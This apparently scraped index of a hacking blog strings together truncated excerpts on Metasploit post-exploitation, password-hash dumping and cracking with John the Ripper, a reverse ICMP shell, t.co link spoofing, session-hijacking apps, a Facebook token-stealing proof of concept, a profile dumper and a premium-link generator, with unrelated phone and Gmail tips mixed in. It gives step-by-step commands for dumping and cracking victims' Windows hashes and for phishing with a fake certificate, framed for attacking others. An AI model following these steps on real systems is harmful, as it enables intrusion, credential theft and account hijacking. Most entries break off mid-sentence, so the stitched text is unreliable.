Howto: Windows Post Exploitation With John The Ripper In Metasploit 4 Or Ophcrack

This post will show you how to get the password after we can get into the victim machine.

1. Exploit victim with Metastploit

2. After got meterpreter shell, run post/windows/gather/hashdump to get password hashs.

  - meterpreter > run post/windows/gather/hashdump

3. Grab the list and send meterpreter shell into background process.
  - meterpreter > background 

4.  Use John The Ripper Module.

Add Backtrack Tools Into Ubuntu11.04

1. Add key gpg for new repository
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Add Backtrack 5 repository into the list
   - vim /etc/apt/sources.list
   deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing   deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing   deb http://

Decoding Mysql Char() to Ascii With Shell Script

When I forensic some logs of websites, I found that many many attack use char() for evasion detection or hard to find malicious code. So I created this simple script for decoding all char() in the log file into ascii character for human reading.

./decoding_char_sql.sh logfiles.log

Example logfiles.log:

target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(

ICMP Shell

icmpsh - simple reverse ICMP shell

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python.


--- Running the Master ---

The master is straight forward to use. There are no extra libraries required for the C version.
The Perl master however has the following dependencies:

* IO::Socket
* NetPacket::IP
* NetPacket::ICMP


When running the

iScanner - Tool to detect and remove malicious codes and web page

iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files. Download: http://iscanner.isecur1ty.org/download/iscanner.tar.gz
 Current Features:

Java Deobfuscate Trick And Tools

Tricks
     Normal Trick:
      1. Assign eval to a variable
        From: eval(code…);
        To: var x = eval(code…); document.write(x);

      2. Replace document.write() with alert()
        From: document.write(code…);
        To: alert(code…);

      3. Replace eval() with document.write()
        From: eval(code…);
        To: document.write(code…);

      4. Wrap code with alert()

Howto: Metasploit Post Exploitation With Inject CA

1. Create the certificate with impersonation-ssl module
 you can download the module from http://blog.c22.cc/2011/09/04/ssl-certificate-impersonation-for-shits-and-giggles/


2. Create phishing site with fake SSL certificate.

3. Get the injection module from https://dev.metasploit.com/redmine/issues/5503


4. Go to Metasploit and exploit the victim.


5. When you get the meterpreter shell, use

Twitter’s t.co URL spoofing.

If you want the detail, please go to the Source.

So after I read the Source, I try to spoof it by myself with

Normal Link:
http://t.co/ZSUXSER6

Target Link:
http://t.co/B4odJfzY

Spoofed Link:
http://t.co/ZSUXSER6:../../../../B4odJfzY

Now when I browse with spoofed link, I will go to target link.

Source: http://blog.12k.nl/post/10604842941/twitters-t-co-url-spoofing
If you like my blog,

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.
 
gathering System related information 


C:\>systeminfo
Running Services


C:\>tasklist /svc
Installed Services


C:\>sc query state= all
Current environment settings


C:\>set
Find Username


C:\>set | find "USERNAME"
Find Domain


C:\>set | find "USERDOMAIN" 
Find Current User Information


C:\>net user

simple-shellcode-generator.py By Didier Stevens

To generate this shellcode with simple-shellcode-generator.py, create a text file (call it createfile.def) with these 2 lines:
 kernel32.dll CreateFileA str 0x0 0x0 0x0 0x2 0x80 0x0
kernel32.dll CloseHandle eax

Each line in this definition file instructs the generator to generate assembler code to lookup the address of the WIN32 API function, and to call it with the arguments you provide.

How to undo send in gmail

1-go to google labs and then Gmail labs  or
 click on the green flask in your Gmail as in image to go directly to the gmail labs

2-and then scroll down page to the feature 
3-Now enable this feature.After doing all this, You enabled this feature to your gmail account.send an email and now you will get undo option after sending any email.

Source: http://tricksndtricks.blogspot.com/2011/03/

Exploiting Microsoft IIS version 6.0 webDAV with Metasploit (exploit)

BACKGROUND

According to technet.microsoft.com, Web Distributed Authoring and Versioning (WebDAV) extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage resources on the Web.

Integrated into IIS, WebDAV allows clients to do the following:

• Manipulate resources in a WebDAV publishing directory on your server. For example, users who have been assigned the correct

WordPress <= 3.1.2 Clickjacking Vulnerability Advisory

                  ( . )
`) (
. ' . ' `.
( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/
(x.0)

Metasploit Spoofing Log Messages.

Description

These modules were developed to aid in testing log management, SIEM, and correlation engines that process syslog messages. These modules can also be used to generate mocked up scenarios to test incident response processes, teams and SOC analysts without having to perform real attacks on critical resources or other systems.

syslog_spoof_custom_message.rb - Basically allows you

Cracking OS X Lion Passwords

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar

DroidSheep. [ Session Hijacking Tool On Android]

What is this about?
If you know Firesheep or Faceniff, you probably know what this is about – one-click session hijacking using your android smartphone or tablet computer.
If you do not know one of these tools, I’ll try to explain what DroidSheep is.
Maybe you know Bob. Bob is a wellknown person and Bob loves coffee. Every morning, he takes his laptop and visits one the famous green

PoC: Hacking Facebook with HTML5 By @skeptic_fx

Facebook Graph API Access Token Stealing : Long live UI-Redressing A week after my first Facebook bounty  , i found another place where Facebook did the same mistake of not busting IFrames.And guess what , its another whole domain developers.facebook.com.It includes all the documentation and examples for using the Facebook Graph API and other products like the Legacy REST API , FQL ,

Droidsheep : Android Application for Session Hijacking

Droidsheep is free alternate of faceniff which is available on download droidsheep website for free. Its one click hijacking tool which supports Amazon.de
facebook.com
flickr.com
twitter.com
linkdein.com
yahoo.com
live.com
google.de (only the non-encrypted services like "maps")
What do you need to run DroidSheep.?
You need an android-powered device, running at least version 2.1 of Android

List of Rogue Certificate That Was Create In Diginotar Incident.

 After hacker hack Diginotar CA, they create many rogue certificate for Man-In-The-Middle, create phishing website or whatever.


This post will paste the link that list of rogue certificate that was create in this incident.

Please revoke the key or certificate if you added it in the past.

Download Link: https://svn.torproject.org/svn/projects/misc/diginotar/rogue-certs-2011-09-04.csv



If

IPhone secret codes | iPhone tricks

List of the secret codes is given below


Code                                        Action 


*#06#                         To display the IMEI Number of the mobile  


*225#                         Use to display the balance detail of postpaid number    


*#43#                         Use to verify if call waiting is enabled


*#61#                         Verify the number for

Link For Download Slide And White Paper From DefCon19

DefCon is one of the oldest continuous running hacker conventions around, and also one of the largest.

Now, Slides of DefCon#19  has ready for download.

Download Link:  https://www.defcon.org/html/links/dc-archives/dc-19-archive.html

If you like my blog, Please Donate Me


One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

FileServe, Filesonic and wupload pemium link generator

FileServe, Filesonic and wupload  are somefamous file hosting website and you need to have a premium account for unlimited and fast download. Today i have an online tool which generates premium links for these 3 filehosting website. I already posted some other tools and online service for hacking and getting premium links of filehosting services. This is a new one which i got online.


Go

Multiple Dictionaries or Wordlists Using John the Ripper

if you want the details, please go to the Source.

John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John's stdin function but I like to run rules against my lists and I didn't see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist

Post-Exploitation Without A TTY

Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.
Using “Expect” To Get A TTY If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port.  This page deals with the former.
Your

Post Exploitation Command Lists

This post is very interesting article from room362, so please go to the Source.

I've had a private list of commands that I run on Windows or Linux when I pop a shell, as I'm sure most pentesters do. It isn't so much a thing of hoarding as much it is just jumbled notes that are 'not worth posting'
Well, I made two (now 3) public google docs (anyone can edit) *don't be a dick clause
Linux/

Firesheep Extended!

“Firesheep is a Firefox extension that demonstrates HTTP session hijacking attacks. You can hijack private accounts on Facebook, Twitter, and other websites that employ weak HTTP protection strategies.“Changes in Firesheep Extended:This version which has been modified by the Alcatel-Lucent Bell Labs focuses on some Web applications like Google Search only verify the (unsecured) user’s session

URGE [Hacking Twitter Tool By Anonymous]

We recently have become tired of seeing trending topics on twitter that were redundant and “pop culture” like.  We have also grown tired of Twitter not trending hash tags that actually serve a cause and mean something to free thinkers of the world.  We have taken note of why Twitter would not do so, they only trend topics which would “appeal” to people and can get people to tweet more.  

fbpwn [A cross-platform Java based Facebook profile dumpe]

A cross-platform Java based Facebook profile dumper, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder.
UsageA typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB

Attackers behind CA hack also targeted Tor